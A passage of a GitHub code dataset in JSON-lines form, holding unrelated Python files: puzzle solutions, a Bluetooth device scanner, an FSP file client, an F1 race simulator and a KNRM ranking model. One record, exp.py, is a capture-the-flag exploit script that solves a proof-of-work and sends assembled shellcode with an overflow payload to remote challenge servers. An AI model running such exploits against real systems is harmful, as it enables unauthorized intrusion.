0,0,0,0\r\nfor adaptor in inputInts:\r\n\tprint (i, \"#\")\r\n\tlastJoltage = 0\r\n\tthisJoltage = adaptor\r\n\tif i > 0: lastJoltage = inputInts[i-1]\r\n\tdiff = thisJoltage - lastJoltage\r\n\tprint (thisJoltage, \"-\", lastJoltage, \"=\", diff)\r\n\tif diff == 1: oneJolt += 1\r\n\tif diff == 3: threeJolts +=1\r\n\ti += 1\r\nhighJoltage = oneJolt * threeJolts\r\nprint (highJoltage, \"jolts\")\r\n \r\n\t","repo_name":"EmceeN/advent20","sub_path":"10/10a.py","file_name":"10a.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37444564803","text":"\nimport sqlite3\nimport bluetooth as blue\nfrom time import sleep\n\nfound_devs = []\nconn = sqlite3.connect('blue.db')\nc = conn.cursor()\n\ndef find_devices():\n print(\"[#] looking for devices\")\n dev_list = blue.discover_devices();\n for device in dev_list:\n if device not in found_devs:\n found_devs.append(device)\n name = str(blue.lookup_name(device))\n print(\"[*] found device name: [{}] [{}]\".format(name, device))\n t = (device, name)\n c.execute(\"INSERT INTO blue_devices VALUES (?,?)\", t)\n conn.commit()\n \ndef main():\n while True:\n find_devices()\n sleep(5)\n find_devices()\n \nif __name__==\"__main__\":\n main()","repo_name":"Shiro-Nakamura/Hacking","sub_path":"offense/blue_collect.py","file_name":"blue_collect.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27409530632","text":"from ex115.ferramentas.opcao import menu\nfrom ex115.ferramentas.titulo import cabecalho\nfrom ex115.ferramentas.arquivo import *\nfrom time import sleep\n\narq = 'cursoemvideo.txt'\n\nif not arquivoExiste(arq):\n criarArquivo(arq)\nwhile True:\n resposta = menu(['Ver pessoas cadastradas', 'Cadastrar nova Pessoa', 'Sair do Sistema'])\n sleep(1)\n if resposta == 1:\n lerArquivo(arq)\n elif resposta == 2:\n cadastrar(arq, 'Nome: ', 'Idade: ')\n elif resposta == 3:\n cabecalho('FINALIZADO... VOLTE SEMPRE!')\n break\n sleep(2)\n","repo_name":"caiosm01/CursoEmVideo_PythonExercicios","sub_path":"ex115/principal.py","file_name":"principal.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39968449361","text":"#!/usr/bin/env python3\nfrom __future__ import print_function\nimport argparse\nimport re\nimport sys\nimport os\n\nimport socket\n\ndef createMessage(serverName):\n return 'WHEREIS '+ serverName +'\\r\\n'\n\n\ndef createFTP(fileName, serverName):\n return ('GET '+ fileName + ' FSP/1.0\\r\\n'\n + 'Agent: xstepa64\\r\\n' \n + 'Hostname: '+ serverName + '\\r\\n\\r\\n')\n\n\ndef fileCopyFTP(TCP_file_name, serverName, fileNameForCreate, TCP_server_adress, TCP_server_port, path):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((TCP_server_adress, TCP_server_port))\n messageFTP = createFTP(TCP_file_name, serverName)\n sock.sendall(messageFTP.encode())\n\n filePath = path + '/' + re.sub(fileNameForCreate, '', TCP_file_name)\n\n try:\n os.makedirs(filePath)\n except OSError:\n try:\n os.chdir(filePath)\n except OSError:\n os.chdir(path)\n else:\n os.chdir(filePath)\n\n counter = 0\n try:\n with open(fileNameForCreate, 'wb') as f:\n while True:\n try: \n sock.settimeout(30)\n data = sock.recv(1024)\n except socket.timeout:\n sys.exit('time is over') \n \n if not data:\n break\n if(not re.search('FSP/1.0 Success', data.decode('latin-1')) and counter == 0):\n sys.exit('this file does not exist')\n elif(counter == 0):\n data = re.sub(b\".+?\\r\\n.+?\\r\\n\\r\\n\", b'', data)\n f.write(data)\n \n \n counter+=1\n\n f.close()\n except PermissionError:\n sys.exit('Permission Error') \n sock.close()\n\n\nparser = argparse.ArgumentParser(description='Program needs two arguments')\nparser.add_argument('-n', help='IP and port number', required=True)\nparser.add_argument('-f', help='Local adress of file', required=True)\nargs = vars(parser.parse_args())\n\ntry:\n # 127.0.0.1\n serverAdress = re.search('^[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+(?=:)', args['n']).group(0)\n # 3333\n serverPort = int(re.search('(?<=:)[0-9]+$', args['n']).group(0))\n # server.one\n serverName = re.search('(?<=^fsp:\\/\\/).+?(?=\\/)', args['f']).group(0)\n TCP_file_name = re.sub('^fsp://.+?/', '', args['f'])\n fileNameForCreate = re.sub('^fsp://.+/', '', args['f'])\n \n \nexcept AttributeError:\n sys.exit('wrong arguments')\n\n\n\ntry: \n clientSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n message = createMessage(serverName)\n\n clientSocket.sendto(message.encode(), (serverAdress, serverPort))\nexcept socket.gaierror:\n sys.exit('wrong server adress or server port')\n\ntry: \n clientSocket.settimeout(30)\n receivedMessage, serverAddr = clientSocket.recvfrom(4096)\nexcept socket.timeout:\n sys.exit('time is over') \n\nclientSocket.close()\n\n\nTCP_server_adress = re.search('(?<=OK ).+(?=:)', receivedMessage.decode('utf-8')).group(0)\nTCP_server_port = int(re.search('(?<=:)[0-9]+$', receivedMessage.decode('utf-8')).group(0))\n\n\npath = os.getcwd()\n\nif(fileNameForCreate == '*'):\n TCP_file_name = 'index'\n fileCopyFTP(TCP_file_name, serverName, 'index', TCP_server_adress, TCP_server_port, path)\n with open('index', 'r') as data:\n for line in data:\n line = re.sub(\"\\n\", '', line)\n try:\n fileCopyFTP(line, serverName, re.sub(\".*/\", '', line), TCP_server_adress, TCP_server_port, path)\n except FileNotFoundError:\n sys.exit('file not found')\n \nelse:\n fileCopyFTP(TCP_file_name, serverName, fileNameForCreate, TCP_server_adress, TCP_server_port, path)\n\n\n\n\n","repo_name":"lnearlol/IPK","sub_path":"projekt1/fileget.py","file_name":"fileget.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13694576452","text":"class Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n if len(needle) == 0:\n return 0\n \n length = len(haystack)\n needle_len = len(needle)\n for i in range(length):\n if i+needle_len > length:\n break\n \n s = haystack[i:i+needle_len]\n if s == needle:\n return i\n \n return -1\n","repo_name":"pdkz/leetcode","sub_path":"0028_Implement_strStr()/0028_Implement_strStr().py","file_name":"0028_Implement_strStr().py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19511964946","text":"import random, time\n\ntracks = {\n \"Bahrain\": {\"CIRC\": \"Bahrain International Circuit\", \"LAPS\": 57, 'POLE': 90.558, \"RAIN\": 0},\n \"Jeddah\": {\"CIRC\": \"Jeddah Street Circuit\", \"LAPS\": 50, 'POLE': 88.2, \"RAIN\": 0},\n \"Melbourne\": {\"CIRC\": \"Albert Park Circuit\", \"LAPS\": 58, 'POLE': 77.868, \"RAIN\": 20},\n \"Imola\": {\"CIRC\": \"Autodromo Enzo e Dino Ferrari\", \"LAPS\": 63, 'POLE': 87.999, \"RAIN\": 30},\n \"Miami\": {\"CIRC\": \"Miami International Autodrome\", \"LAPS\": 57, 'POLE': 88.796, \"RAIN\": 15},\n \"Barcelona\": {\"CIRC\": \"Circuit de Barcelona-Catalunya\", \"LAPS\": 66, 'POLE': 79.750, \"RAIN\": 15},\n \"Monaco\": {\"CIRC\": \"Circuit de Monaco\", \"LAPS\": 78, 'POLE': 71.376, \"RAIN\": 60},\n \"Baku\": {\"CIRC\": \"Baku City Circuit\", \"LAPS\": 51, 'POLE': 101.359, \"RAIN\": 20},\n \"Montreal\": {\"CIRC\": \"Circuit Gilles Villeneuve\", \"LAPS\": 70, 'POLE': 81.299, \"RAIN\": 50},\n \"Silverstone\": {\"CIRC\": \"Silverstone Circuit\", \"LAPS\": 52, 'POLE': 100.983, \"RAIN\": 40},\n \"Austria\": {\"CIRC\": \"Red Bull Ring\", \"LAPS\": 71, 'POLE': 64.984, \"RAIN\": 30},\n \"Paul Ricard\": {\"CIRC\": \"Circuit Paul Ricard\", \"LAPS\": 53, 'POLE': 90.872, \"RAIN\": 20},\n \"Budapest\": {\"CIRC\": \"Hungaroring\", \"LAPS\": 70, 'POLE': 77.377, \"RAIN\": 55},\n \"Belgium\": {\"CIRC\": \"Circuit de Spa-Francorchamps\", \"LAPS\": 44, 'POLE': 103.665, \"RAIN\": 50},\n \"Zandvoort\": {\"CIRC\": \"Circuit Zandvoort\", \"LAPS\": 72, 'POLE': 70.342, \"RAIN\": 20},\n \"Monza\": {\"CIRC\": \"Autodromo Nazionale di Monza\", \"LAPS\": 53, 'POLE': 80.161, \"RAIN\": 20},\n \"Singapore\": {\"CIRC\": \"Marina Bay Street Circuit\", \"LAPS\": 61, 'POLE': 109.412, \"RAIN\": 75},\n \"Suzuka\": {\"CIRC\": \"Suzuka Intl. Racing Course\", \"LAPS\": 53, 'POLE': 89.304, \"RAIN\": 40},\n \"Austin\": {\"CIRC\": \"CIRC of The Americas\", \"LAPS\": 56, 'POLE': 94.356, \"RAIN\": 15},\n \"Mexico\": {\"CIRC\": \"Autodromo Hermanos Rodriguez\", \"LAPS\": 71, 'POLE': 77.775, \"RAIN\": 20},\n \"Brazil\": {\"CIRC\": \"Autodromo Jose Carlos Pace\", \"LAPS\": 71, 'POLE': 71.674, \"RAIN\": 85},\n \"Abu Dhabi\": {\"CIRC\": \"Yas Marina Circuit\", \"LAPS\": 55, 'POLE': 83.8241, \"RAIN\": 0},\n}\n\ndrivers = {\n \"VER\": {\"Team\": \"Red Bull\", \"QUA\": 95, \"RAC\": 95, \"AWA\": 91, \"EXP\": 78, \"REL\": 90, \"STR\": 95},\n \"LEC\": {\"Team\": \"Ferrari\", \"QUA\": 94, \"RAC\": 91, \"AWA\": 92, \"EXP\": 72, \"REL\": 89, \"STR\": 79},\n \"PER\": {\"Team\": \"Red Bull\", \"QUA\": 89, \"RAC\": 90, \"AWA\": 91, \"EXP\": 84, \"REL\": 90, \"STR\": 95},\n \"RUS\": {\"Team\": \"Mercedes\", \"QUA\": 88, \"RAC\": 88, \"AWA\": 83, \"EXP\": 70, \"REL\": 95, \"STR\": 71},\n \"SAI\": {\"Team\": \"Ferrari\", \"QUA\": 91, \"RAC\": 89, \"AWA\": 89, \"EXP\": 78, \"REL\": 89, \"STR\": 79},\n \"HAM\": {\"Team\": \"Mercedes\", \"QUA\": 87, \"RAC\": 87, \"AWA\": 95, \"EXP\": 91, \"REL\": 95, \"STR\": 71},\n \"NOR\": {\"Team\": \"McLaren\", \"QUA\": 86, \"RAC\": 80, \"AWA\": 86, \"EXP\": 70, \"REL\": 92, \"STR\": 89},\n \"OCO\": {\"Team\": \"Alpine\", \"QUA\": 80, \"RAC\": 79, \"AWA\": 82, \"EXP\": 73, \"REL\": 75, \"STR\": 77},\n \"ALO\": {\"Team\": \"Alpine\", \"QUA\": 84, \"RAC\": 79, \"AWA\": 79, \"EXP\": 95, \"REL\": 75, \"STR\": 77},\n \"BOT\": {\"Team\": \"Alfa Romeo\", \"QUA\": 79, \"RAC\": 76, \"AWA\": 93, \"EXP\": 81, \"REL\": 77, \"STR\": 66},\n \"RIC\": {\"Team\": \"McLaren\", \"QUA\": 76, \"RAC\": 71, \"AWA\": 71, \"EXP\": 84, \"REL\": 92, \"STR\": 89},\n \"VET\": {\"Team\": \"Aston Martin\", \"QUA\": 75, \"RAC\": 75, \"AWA\": 87, \"EXP\": 90, \"REL\": 92, \"STR\": 76},\n \"MAG\": {\"Team\": \"Haas\", \"QUA\": 78, \"RAC\": 70, \"AWA\": 82, \"EXP\": 76, \"REL\": 92, \"STR\": 65},\n \"GAS\": {\"Team\": \"AlphaTauri\", \"QUA\": 77, \"RAC\": 72, \"AWA\": 65, \"EXP\": 73, \"REL\": 89, \"STR\": 79},\n \"STR\": {\"Team\": \"Aston Martin\", \"QUA\": 71, \"RAC\": 72, \"AWA\": 71, \"EXP\": 74, \"REL\": 92, \"STR\": 76},\n \"MSC\": {\"Team\": \"Haas\", \"QUA\": 73, \"RAC\": 69, \"AWA\": 86, \"EXP\": 67, \"REL\": 92, \"STR\": 65},\n \"TSU\": {\"Team\": \"AlphaTauri\", \"QUA\": 75, \"RAC\": 70, \"AWA\": 75, \"EXP\": 67, \"REL\": 89, \"STR\": 79},\n \"ZHO\": {\"Team\": \"Alpha Romeo\", \"QUA\": 73, \"RAC\": 70, \"AWA\": 79, \"EXP\": 65, \"REL\": 77, \"STR\": 66},\n \"ALB\": {\"Team\": \"Williams\", \"QUA\": 73, \"RAC\": 71, \"AWA\": 66, \"EXP\": 68, \"REL\": 92, \"STR\": 74},\n \"LAT\": {\"Team\": \"Williams\", \"QUA\": 65, \"RAC\": 65, \"AWA\": 74, \"EXP\": 69, \"REL\": 92, \"STR\": 74},\n}\n\nweather = {\n \"Sunny\": {\"TEMP\": 26, \"DELT\": 1},\n \"Light Cloud\": {\"TEMP\": 22, \"DELT\": 1.005},\n \"Cloudy\": {\"TEMP\": 16, \"DELT\": 1.01},\n \"Light Rain\": {\"TEMP\": 15, \"DELT\": 1.1},\n \"Heavy Rain\": {\"TEMP\": 14, \"DELT\": 1.15}\n}\n\nfor driver, data in drivers.items():\n drivers[driver][\"GRI\"] = 0\n drivers[driver][\"TIM\"] = 0\n drivers[driver][\"TOT\"] = 0\n drivers[driver][\"DNF\"] = False\n\nprint(\"\\n------------------------------------\\n\\nWelcome to skyv1111's F1 Simulator!\\n\")\n\nfor i, (l, r) in enumerate(zip(list(tracks.items())[:len(list(tracks.items())) // 2], list(tracks.items())[len(list(tracks.items())) // 2:])):\n print(f\"{i + 1:2}. {l[0]:15s} {i + len(list(tracks.items())) // 2 + 1:2}. {r[0]:30s}\")\n\nsel_track = input(\"\\nSelect a track: \").lower()\n\nwhile sel_track.lower() not in [t.lower() for t in tracks.keys()] and not any(str(i + 1) == sel_track for i in range(len(tracks))):\n sel_track = input(\"\\nInvalid track. Select a track: \").lower()\n\nif sel_track.isdigit():\n sel_track = list(tracks.keys())[int(sel_track) - 1]\nelse:\n sel_track = [t for t in tracks.keys() if t.lower() == sel_track][0]\n\ndef simulate_qualifying(drivers):\n\n print(\"\\n------------------------------------\\n\\nQualifying Information:\")\n\n track = tracks[sel_track][\"CIRC\"]\n pole = tracks[sel_track][\"POLE\"]\n rain = tracks[sel_track][\"RAIN\"]\n\n grid_penalties = []\n\n if rain == 0:\n cond = random.choice([\"Sunny\", \"Light Cloud\"])\n elif rain > 50:\n cond = random.choice([\"Sunny\", \"Light Cloud\", \"Cloudy\", \"Light Rain\", ])\n else:\n cond = random.choice([\"Sunny\", \"Light Cloud\", \"Cloudy\", \"Light Rain\", \"Heavy Rain\"])\n\n temp = weather[cond][\"TEMP\"]\n temp_delta = weather[cond][\"DELT\"]\n\n print(f\"\\nCircuit: {track}\\nWeather: {cond}\\nTemperature: {temp + random.randint(-3, 3)}°C\")\n\n for driver, data in drivers.items():\n if cond == \"Light Rain\" or cond == \"Heavy Rain\":\n qualifying_time = pole + temp_delta + random.uniform(-0.1, 1.9) + 9.5 - (data[\"QUA\"] / 10)\n elif cond in [\"Sunny\", \"Light Cloud\", \"Cloudy\"]:\n qualifying_time = pole + temp_delta + random.uniform(-0.1, 0.9) + 9.5 - (data[\"QUA\"] / 10)\n data[\"TIM\"] = qualifying_time\n\n sorted_grid = sorted(drivers.items(), key=lambda x: x[1][\"TIM\"])\n\n for i, (driver, data) in enumerate(sorted_grid):\n if random.random() < 0.01:\n grid_penalty = random.choice([5, 10, 15, 20])\n drivers[driver][\"GRI\"] = i + 1 + grid_penalty\n grid_penalties.append((driver, grid_penalty))\n else:\n drivers[driver][\"GRI\"] = i + 1\n drivers[driver][\"TIM\"] = data[\"TIM\"]\n\n if grid_penalties:\n print(\"Grid Penalties: \", end=\"\")\n for i, (driver, penalty) in enumerate(grid_penalties):\n if i == 0:\n print(f\"{driver} ({penalty})\")\n else:\n print(f\"\\t\\t\\t {driver} ({penalty})\")\n\n sorted_grid = sorted(drivers.items(), key=lambda x: x[1][\"GRI\"])\n\n print(\"\\n------------------------------------\\n\\nStarting Grid:\\n\")\n\n\n for i in range(0, len(sorted_grid), 2):\n left_driver = sorted_grid[i]\n right_driver = sorted_grid[i + 1] if i + 1 < len(sorted_grid) else None\n left_time = f\"{left_driver[1]['TIM'] // 60:1.0f}:{left_driver[1]['TIM'] % 60:06.3f}\"\n right_time = f\"{'':>5}{right_driver[1]['TIM'] // 60:1.0f}:{right_driver[1]['TIM'] % 60:06.3f}\"\n\n print(f\"{i + 1:2}. {left_driver[0]:<15s}{i + 2:2}. {right_driver[0]:<2s}\")\n print(f\"{'':>4}{left_time:14}{right_time}\")\n\n\n\ndef simulate_race(drivers):\n print(\"\\n------------------------------------\\n\\nRace Information:\")\n\n rain_chance = tracks[sel_track][\"RAIN\"]\n if rain_chance == 0:\n cond = random.choice([\"Sunny\", \"Light Cloud\"])\n elif rain_chance > 50:\n cond = random.choice([\"Sunny\", \"Light Cloud\", \"Cloudy\", \"Light Rain\", ])\n else:\n cond = random.choice([\"Sunny\", \"Light Cloud\", \"Cloudy\", \"Light Rain\", \"Heavy Rain\"])\n\n track = tracks[sel_track][\"CIRC\"]\n temp = weather[cond][\"TEMP\"] + random.randint(-3, 3)\n temp_delta = weather[cond][\"DELT\"]\n pole = tracks[sel_track][\"POLE\"]\n\n print(f\"\\nCircuit: {track}\\nWeather: {cond}\\nTemperature: {temp}°C\\n\")\n\n print(\"------------------------------------\\n\")\n\n race_results = {}\n\n for lap in range(1, tracks[sel_track][\"LAPS\"] + 1):\n\n for driver in drivers:\n\n if lap <= 10:\n grid = 1.0 + (drivers[driver][\"GRI\"] - 1) * 0.01\n lap_time = (pole * grid + random.uniform(-0.1, 2) + 9.5 - (data[\"RAC\"] / 10)) * temp_delta\n grid - 0.001\n else:\n lap_time = (pole * grid + random.uniform(-0.1, 0.5) + 9.5 - (data[\"RAC\"] / 10)) * temp_delta\n\n leader = min(drivers.items(), key=lambda x: x[1][\"TOT\"])\n\n if leader[0] != driver:\n delta_time = drivers[leader[0]][\"TOT\"] - drivers[driver][\"TOT\"]\n if delta_time <= 1:\n lap_time -= 0.25\n\n drivers[driver][\"TOT\"] += lap_time\n\n sorted_race = sorted(drivers.items(), key=lambda x: x[1][\"TOT\"])\n\n\n lap_leader = min(drivers.items(), key=lambda x: x[1][\"TOT\"])[0]\n\n print(f\"[Lap {lap} / {tracks[sel_track]['LAPS']}] \\n {lap_leader} leads\")\n\n prev_leader = lap_leader\n\n sorted_race = sorted(drivers.items(), key=lambda x: x[1][\"TOT\"])\n leader_lap_time = sorted_race[0][1][\"TOT\"]\n\n leader_avg_lap = leader_lap_time / lap\n leader_lap_time = sorted_race[0][1][\"TOT\"]\n\n print()\n\n # Print race results (TEMP)\n\n for i in range(0, len(sorted_race), 2):\n left_driver = sorted_race[i]\n right_driver = sorted_race[i + 1] if i + 1 < len(sorted_race) else None\n\n left_time = f\"{left_driver[1]['TOT'] // 60:1.0f}:{left_driver[1]['TOT'] % 60:06.3f}\"\n right_time = f\"{'':>5}{right_driver[1]['TOT'] // 60:1.0f}:{right_driver[1]['TOT'] % 60:06.3f}\"\n\n print(f\"{i + 1:2}. {left_driver[0]:<15s}{i + 2:2}. {right_driver[0]:<2s}\")\n print(f\"{'':>4}{left_time:14}{right_time}\")\n\nsimulate_qualifying(drivers)\nsimulate_race(drivers)\n","repo_name":"skyv1111/py-f1-simulator","sub_path":"simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":10219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23577060791","text":"from __future__ import print_function\nimport sys\nimport numpy as np\nimport math\n\ndef getminmax(x, r):\n low = ((x * 10)+(11*r)-1) // (11*r)\n high = (x * 10) // (9*r)\n if low <= high:\n return (low, high)\n return (0,0)\n\ndef overlaps(x, y):\n return x[0] <= y[1] and y[0] <= x[1]\n\ndef getnumpackages(N, P, R, plist):\n #Get min, max servings\n mmlist = []\n for x in range(N):\n mmlist.append([])\n line = np.sort(plist[x])\n for y in range(P):\n z = getminmax(line[y], R[x])\n if z[1] != 0:\n mmlist[x].append(z)\n #Go through list finding packages\n count = 0\n ilist = [0] * N\n for x in mmlist[0]:\n found = True\n for row in range(1,N):\n if ilist[row] >= len(mmlist[row]):\n return count\n while mmlist[row][ilist[row]][1] < x[0]:\n ilist[row] += 1\n if ilist[row] >= len(mmlist[row]):\n return count\n if not overlaps(x, mmlist[row][ilist[row]]):\n found = False\n break\n if found:\n count += 1\n for row in range(1,N):\n ilist[row] += 1\n \n return count\n\n#Read data\nif len(sys.argv) < 2:\n print(\"Missing input file name\")\n quit()\nwith open(sys.argv[1], \"r\") as f:\n T = int(f.readline())\n for x in range(T):\n plist = []\n N, P = [int(z) for z in f.readline().split()]\n R = [int(z) for z in f.readline().split()]\n for y in range(N):\n plist.append([int(z) for z in f.readline().split()])\n print(\"Case #%d: %d\" % (x + 1, getnumpackages(N, P, R, plist)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_204/188.py","file_name":"188.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26097396990","text":"from pwn import *\nimport os, string, hashlib\nfrom multiprocessing import Pool\n\n\ndef solve_hash(k):\n target = hash\n chars = string.ascii_letters + string.digits\n sha256 = hashlib.sha256\n suffix1 = k.encode() + suffix\n for a in chars:\n for b in chars:\n for c in chars:\n for d in chars:\n if sha256((a + b + c + d).encode() + suffix1).digest() == target:\n res = (a + b + c + d).encode() + suffix1\n print('found', res)\n return res\n return None\n\n\nif __name__ == '__main__':\n n = 2088\n s = []\n t = n - 1 - 99\n s.append(b'a' * 99)\n cur = 97\n while t:\n cur += 1\n u = min(t, 98)\n s.append(b'a' + bytes([cur]) * u)\n t -= u\n s.append(b'\\x0500')\n\n os.system('python3 asm.py exp.S /tmp/exp1 > /tmp/exp')\n exp = bytes(eval(open('/tmp/exp').read()))\n for x in [b'\\0', b'\\r', b'\\n']:\n assert x not in exp\n\n exp = b'\\x05' + b'0' * 9 + exp + (7915999 + 1 - 7915876 - len(exp)) * b'0' + b'flag'\n payload = b'%d\\n' % len(s) + b'\\n'.join(s) + b'\\n1\\n' + exp + b'\\n'\n\n r = remote('120.24.57.117', 47987)\n #r = remote('47.106.193.146', 41890)\n #context.log_level = 'debug'\n if 1:\n r.recvuntil('sha256(?????+\"')\n suffix = r.recv(15)\n r.recvuntil('==')\n hash = bytes.fromhex(r.recv(64).decode())\n print(suffix, hash)\n p = Pool(8)\n chars = string.ascii_letters + string.digits\n for x in p.map(solve_hash, chars):\n if x is not None:\n r.sendline(x[:5])\n if 0:\n r.recvuntil('Input number of template strings: ')\n r.sendline('100')\n for i in range(1000):\n time.sleep(1)\n r.recvuntil('Template string')\n r.sendline('1')\n print(i)\n r.send(payload)\n r.interactive() # be patient\n","repo_name":"mcfx/trivm","sub_path":"challenges/string/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"32585098698","text":"import sys\r\nsys.path.append('/home/mshah1/narrativeQA/NN4NLP-Project/src')\r\nimport numpy as np\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.nn import functional as F\r\nfrom ReadingComprehension.IterativeReattentionAligner.modules import (InteractiveAligner, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\tSelfAligner, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\tSummarizer, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\tAnswerPointer)\r\nfrom utils.utils import *\r\n\r\nclass GaussianKernel(object):\r\n\t\"\"\"docstring for GaussianKernel\"\"\"\r\n\tdef __init__(self, mean, std):\r\n\t\tsuper(GaussianKernel, self).__init__()\r\n\t\tself.mean = mean\r\n\t\tself.std = std\r\n\r\n\tdef __call__(self, x):\r\n\t\tsim = torch.exp(-0.5 * (x-self.mean)**2 / self.std**2)\r\n\t\treturn sim\r\n\t\t\r\n\r\nclass KNRM(nn.Module):\r\n\t\"\"\"docstring for ConvKNRM\"\"\"\r\n\tdef __init__(self, init_emb=None, emb_trainable=True, vocab_size=None, \r\n\t\t\t\t\temb_dim=100, nkernels=11, sigma=0.1, exact_sigma=0.001, dropout=0.3):\r\n\t\tsuper(KNRM, self).__init__()\r\n\t\tif init_emb is not None:\r\n\t\t\tself.emb = nn.Embedding.from_pretrained(init_emb, \r\n\t\t\t\t\t\t\t\t\t\tfreeze=(not emb_trainable))\r\n\t\telse:\r\n\t\t\tself.emb = nn.Embedding(vocab_size, emb_dim)\r\n\t\t\r\n\t\tself.kernels = []\r\n\t\tfor i in range(nkernels):\r\n\t\t\tmu = 1/(nkernels-1) + 2*i/(nkernels-1) - 1\r\n\r\n\t\t\tif mu > 1:\r\n\t\t\t\tself.kernels.append(GaussianKernel(1., exact_sigma))\r\n\t\t\telse:\r\n\t\t\t\tself.kernels.append(GaussianKernel(mu, sigma))\r\n\t\t\r\n\r\n\t\tself.linear = nn.Linear(nkernels, 1, bias=False)\r\n\t\tself.dropout = nn.Dropout(dropout)\r\n\tdef embed(self, x):\t\t\r\n\t\tx_emb = self.emb(x[:,:,0])\r\n\t\tx_emb = x_emb / (torch.norm(x_emb, dim=2, keepdim=True) + 1e-10)\r\n\t\treturn x_emb\r\n\r\n\tdef score(self, q_emb, d_emb, qlen, dlen):\r\n\t\tsim = torch.bmm(q_emb, d_emb.transpose(1,2))\r\n\t\tsim = self.dropout(sim)\r\n\r\n\t\tkernel_counts = []\r\n\t\tfor K in self.kernels:\r\n\t\t\tprobs = K(sim)\r\n\t\t\tqt_match_count = torch.sum(probs, dim=2)\t\t\t\t\t\r\n\t\t\ttotal_count = torch.sum(torch.log1p(qt_match_count), dim=1)\r\n\t\t\t\r\n\t\t\tif not torch.isfinite(total_count).all():\r\n\t\t\t\tprint('bad total_count')\r\n\t\t\t\tprint(total_count)\r\n\t\t\t\tprint(torch.min(probs))\r\n\t\t\t\tprint(torch.min(qt_match_count))\r\n\t\t\t\tprint(torch.min(sim))\r\n\t\t\t\tprint(torch.min(q_emb))\r\n\t\t\t\tprint(torch.min(d_emb))\r\n\t\t\t\treturn\r\n\r\n\t\t\tkernel_counts.append(total_count)\r\n\t\tkernel_counts = torch.stack(kernel_counts, dim=1)\r\n\r\n\t\tscore = self.linear(kernel_counts).squeeze(1)\r\n\t\treturn score\r\n\r\n\tdef forward(self, q, d, qlen, dlen):\r\n\t\tif not torch.isfinite(q).all():\r\n\t\t\tprint('bad q')\r\n\t\t\tprint(q)\r\n\t\t\tprint(d)\r\n\t\t\treturn\r\n\t\tq_emb = self.embed(q)\r\n\t\td_emb = self.embed(d)\r\n\t\tscore = self.score(q_emb, d_emb, qlen, dlen)\t\t\r\n\t\tscore += 1e-10\r\n\t\treturn score\r\n\r\n\tdef getSentScores(self, q, c, qlen, clen, batch_size):\t\t\r\n\t\tscores = torch.zeros(c.shape[0]).float().to(c.device)\r\n\t\tn_batches = (c.shape[0] + batch_size - 1) // batch_size\r\n\t\tfor i in range(n_batches):\r\n\t\t\tc_batch = c[i*batch_size:(i+1)*batch_size]\t\t\t\r\n\t\t\tclen_batch = clen[i*batch_size:(i+1)*batch_size]\r\n\r\n\t\t\tq_batch = q[i*batch_size:(i+1)*batch_size]\r\n\t\t\tqlen_batch = qlen[i*batch_size:(i+1)*batch_size]\r\n\r\n\t\t\t# print(c_batch.shape, clen_batch.shape)\r\n\t\t\t# print(q_batch.shape, qlen_batch.shape)\r\n\r\n\t\t\tscores[i*batch_size:(i+1)*batch_size] = self.score(q_batch, c_batch, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tqlen_batch, clen_batch)\r\n\t\treturn scores\r\n\r\n\tdef forward_singleContext(self, q, d, qlen, dlen, batch_size=1024):\r\n\t\tq = self.embed(q)\r\n\t\td = self.embed(d)\r\n\r\n\t\tscores = []\r\n\t\tfor i in range(q.shape[0]):\r\n\t\t\tq_ = q[i, :qlen[i]]\r\n\t\t\tq_ = q_.expand(d.shape[0], -1, -1)\r\n\r\n\t\t\tqlen_ = qlen[i:i+1].expand(q_.shape[0])\t\r\n\r\n\t\t\t# print(torch.cuda.memory_allocated(0) / (1024)**3)\r\n\t\t\t# c_scores = self.score(q_, d, qlen_, dlen)\r\n\t\t\tc_scores = self.getSentScores(q_, d, qlen_, dlen, batch_size)\r\n\t\t\t# print(c_scores.shape)\r\n\r\n\t\t\tscores.append(c_scores)\r\n\r\n\t\tscores = torch.stack(scores, dim=0)\r\n\t\treturn scores\r\n\r\nif __name__ == '__main__':\r\n\tq = torch.LongTensor(torch.randint(10, size=(2,10,2)).long())\r\n\td = torch.LongTensor(torch.randint(3, size=(3,4,2)).long())\r\n\tqlen = torch.LongTensor([1,2])\r\n\tdlen = torch.LongTensor([2,3])\r\n\r\n\tm = ConvKNRM(vocab_size=20)\r\n\tprint(m.forward_singleContext(q, d, qlen, dlen))","repo_name":"Mayer123/NN4NLP-Project","sub_path":"src/InformationRetrieval/SimpleRM/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18695953449","text":"import sys, os\nsys.path.append(os.path.join(os.getcwd(), \"model\"))\n\nimport inception\nimport json\nfrom aml_response import AMLResponse\n\ndef init():\n global 